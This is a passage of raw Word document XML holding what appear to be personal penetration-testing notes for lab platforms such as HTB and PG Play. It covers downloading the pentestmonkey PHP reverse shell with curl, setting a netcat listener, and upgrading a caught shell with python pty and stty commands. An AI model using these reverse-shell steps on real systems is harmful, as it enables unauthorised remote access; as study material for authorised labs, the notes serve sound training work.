      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="721"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o [FILENAME].php https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="721"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">REMEMBER TO CHANGE THE IP AND PORT NUMBER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="721"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And remember to make the IP equal to the IP of YOUR MACHINE, not the target machines! Since the reverse shell will be sent back to YOU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FC9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Background Jobs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="867"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, we will use CTRL + Z to background a shell. And then here is how to get the shell back from the background</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="867"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="867"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will list all the current jobs in background</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="867"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fg [number]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="867"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace number with the number associated with the job that you want to use from the background</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="867"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Typing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fg </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">without any arguments will get most recent background job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FD0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FD1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F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FD3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pzko0tlv478l" w:id="132"/>
      <w:bookmarkEnd w:id="132"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading Reverse Shell</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FD4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USE PENELOPE: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FD5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId325">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/brightio/penelope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Important: When setting up a reverse shell, make sure to set the IP to YOUR IP, and not the target machine, since the reverse shell will be sent back to you!</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to upgrade shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">guide</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="603"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId326">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FDB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another guide: </w:t>
      </w:r>
      <w:hyperlink r:id="rId327">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="528"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the /bin/bash doesn't work, just try replacing it with /bin/sh</w:t>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t xml:space="preserve">Here's what I do:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="221"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty; pty.spawn("/bin/sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="221"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the "sh" alternative</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty raw -echo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's an example from this </w:t>
      </w:r>
      <w:hyperlink r:id="rId328">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Katana</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play writeup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FEA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FEB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FEC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export TERM=xterm-256color</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I then used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl+Z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to background the process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FEE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty raw -echo ; fg ; reset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FEF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty columns 200 rows 200</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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's what they do in HTB:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nc -lvnp 4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty; pty.spawn("/bin/sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1415"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the "sh" alternative</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ctrl+z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty raw -echo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FFA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FFB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xterm</w:t>
      </w:r>
    </w:p>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's another one:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FFE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty;pty.spawn("/bin/bash")'      </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
